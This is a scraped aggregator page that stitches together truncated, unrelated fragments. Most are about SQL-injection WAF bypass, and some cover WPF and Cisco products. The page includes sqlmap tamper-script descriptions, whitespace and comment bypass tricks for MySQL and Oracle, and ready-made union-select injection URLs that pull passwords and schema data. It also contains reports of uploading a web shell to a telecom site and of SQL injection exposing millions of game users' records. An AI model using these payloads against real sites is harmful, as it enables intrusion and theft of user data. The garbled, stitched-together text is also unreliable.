"--" followed by a random string and a newline character to replace the whitespace space2hash.py with the pound notation "#" followed by a random string and a newline character to replace the whitespace space2morehash.py with the pound notation "#" followed by a random string and a newline character to replace the whitespace space2mssqlblank.py replacing whitespace with random whitespace characters from a valid set of alternate character sets space2mssqlhash.py with the pound notation "#" follo
In this article, I will share with you several WAF bypass skills. For some tips that everyone knows, such :/*! */, SELECT [0x09, 0x0A-0x0D, 0x20, 0xA0] xx FROM does not recreate the wheel.
Mysql:
Tips1: Magic '(the controller of the output table in the format)
Space and some regular expressions.
mysql>select`version`()
->;
+----------------------+
|`version`()|
+----------------------+
|5.1.50-community-log|
+-------------------
I have studied waf at home and abroad. Share some amazing tricks.
Some skills that everyone knows are as follows :/*! */, SELECT [0x09, 0x0A-0x0D, 0x20, 0xA0] xx FROM does not recreate the wheel.
MysqlTips1: Magic '(the controller of the output table in the format)
Space and some regular expressions.
mysql> select`version`() -> ; +----------------------+ | `version`() | +----------------------+ | 5.1.50-community-log | +-------------
Download the System.Windows.Interactivity.dll file and introduce it into the project (as you can see in the reference list of the VS project).Using the DLL in XAMLXmlns:i= "Clr-namespace:system.windows.interactivity;assembly=system.windows.interactivity"get focus, lose focus event for TextBox control -TextBoxText= "Test"> i:interaction. Triggers> I:eventtriggerEventName= "LostFocus"> i:invokecommandactionCommand="{Binding Relativesource={relativesource ancestortype=window},p
Web Code saw http://sourceforge.net/projects/sqlxsswaf? Source = directory
Start read!
I. Main Functions
The process is clear,
1. the main function of WAF is an endless loop. In the while (1) code segment, after the code completes processing the current log Content, it sleeps for 10 ms and continues to process new content from get_pos.
2. When the second while processing log finds the log Content starting with get or post, it checks the commands sent
/addslashes feature —————————————————————————— –equaltolike.pylike instead of equals example:* input:select * from Users where Id=1* Output:select * from the users where id like 1Tested against:* Microsoft SQL Server 2005* MySQL 4, 5.0 and 5.5 —————————————————————————-keyword before comment halfversionedmorekeywords.pyexample:* input:value ' UNION all SELECT CONCAT (CHAR (58,107,112,113,58), Ifnull (CAST (Current_User () as Char), char (+)), char (58,97,110,121,58)), NULL, null# and ' qdwa ' =
%0a1,2,3/*uyg.php?id=1/**/union%a0select/**/1,pass,3 ' A ' from ' users 'Uyg.php?id= (0) union (SELECT (TABLE_SCHEMA), TABLE_NAME, (0) from (information_schema.tables) have ((Table_schema) Like (0x74657374) (table_name)! = (0x7573657273))) #Uyg.php?id=union (select (version ()))--uyg.php?id=123/*! UNION ALL Select version () */--Uyg.php?id=123/*!or*/1=1;uyg.php?id=1+union+select+1,2,3/*uyg.php?id=1+union+select+1,2,3--uyg.php?id=1+union+select+1,2,3#uyg.php?id=1+union+select+1,2,3;%0 0Uyg.php?i
China Telecom Jiangxi main site can be accessed by getshell over waf
Verify getshell
Address: http ://**. **. **. **/res/active/4G/upload. jsp (login required) Upload Vulnerability is also installed with security software, so I killed all my horsesHowever, this is not the focus.Upload pony first
POST http://**.**.**.**/AttachmentServlet?backUrl=/service/upload/img_upload.jsp HTTP/1.1Host: **.**.**.**Connection: keep-aliveContent-Length: 1912Cache-Cont
Original address: http://bbs.10hst.com/viewthread.php? Tid = 39 extra = page % 3D1====== Bypass the anti-injection system, including the test code of WAF ======Solution 1: Replace the space in the test code with/**/or + (Note:/**/and + do not perform url encoding)?
To copy the Code as it is, double-click the code and right-click the code to copy it.
010203
For example, id = 1 or 1 = 1Id = 1/**/or/**/1 = 1Id = 1 + or + 1 = 1
SQL Injection for DBA permissions on the WAF web game main site (only two databases of the current database are viewed, with more than 2 million user information)
Web game master site DBA permission SQL injection (tens of millions of user information, recharge records, novice card leakage) (involving well-known games such as the wild, storm, and Master)
Web Game Web site: http://www.wa3.com/It says:
Wow web games, the most distinctive web game platfor
403 Request Denied with special charactersWhite list rule syntax:Basicrule wl:id [Negative] [mz:[$URL: target_url]|[ match_zone]| [$ARGS _var:varname]| [$BODY _vars:varname]| [$HEADERS _var:varname]| [NAME]]Wl:id (white list ID) which interception rules will go to whitelistwl:0: Add all the interception rules to whitelistWl:42: Whitelist the interception rule with ID 42Wl:42,41,43: Whitelist the interception rules with IDs 42, 41, and 43WL:-42: Add all interception rules to whitelist except for
Tips:Injection point used: Support Union can error support multi-line execution, executable system command, HTTP request, and other advantages other than the above type, you may need a brute force guess. When you are guessing, you may encounter some limitations. All the attackers have to do is break them up. 1. Binary is typically used to find a single character by bypassing the greatest function, which cannot be used to guess the size of a symbol. Mysql> Select ASCII (Mid (User (),) SQL Injecti
0x01 backgroundOracle is similar to MySQL features, semi-automated fuzz, recording results.0x02 Test Position One: The position between the parameter and the Union1) White space charactersThe white space characters available in Oracle are:%00%09%0a%0b%0c%0d%202) Comment Symbol/**/3) Other characters%2e. Point numberPosition two: The position between union and select1) White space charactersThe white space characters available in Oracle are:%00%09%0a%0b%0c%0d%202) Comment Symbol/**/Position three
Half a year five acquisitions Cisco intensive integration for self-redemptionWu MicroCisco, a "takeover guru", recently announced a new deal.The acquisition was Cloudlock, a cloud security company, with a total transaction price of $293 million. This is the fifth takeover deal that Cisco has launched this year.As the world's largest network equipment manufacturer, Cisco
From today onwards, let's show a few of the basic features of Cisco UC, one of the first basic features: Cisco IP Phone.The word Cisco CUCM is bull x!Knowing that the CUCM is a ippbx in a cow's lecture, it provides the phone function of the IP phone to replace the traditional analog phone.In fact, know this is a broken cow, but also in the study of Microsoft's UC
Overview
This product announcement focuses on Cisco®Catalyst®Cisco IOS on 6500 series switches®See Figure 1 ).
The Cisco Catalyst 6500 series, modular with Cisco IOS software, improves operational efficiency and minimizes downtime through continuous evolution of software infrastructure. By running the modular
WIN8 Cisco VPN 442 Error solution/Error Code 442 Cisco VPN Clinet with Windows 8 when you start using win8, because of work needs to use Cisco VPN Client, however, in win8, the Cisco VPN Client reports a 442 Error and cannot be used. The following Error message is displayed: Error Code 442 while connect to VPN server b
With the advent of the Internet era, more and more work and information technology-related, in the requirements of the times, each person's development and employment needs to have the knowledge and quality of the Internet, then in this do not test the certificate of the age, Cisco gold content such a high certificate in the end there is no use? The leading-edge education small compilation uses the data to explain the question.Because our large depart
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.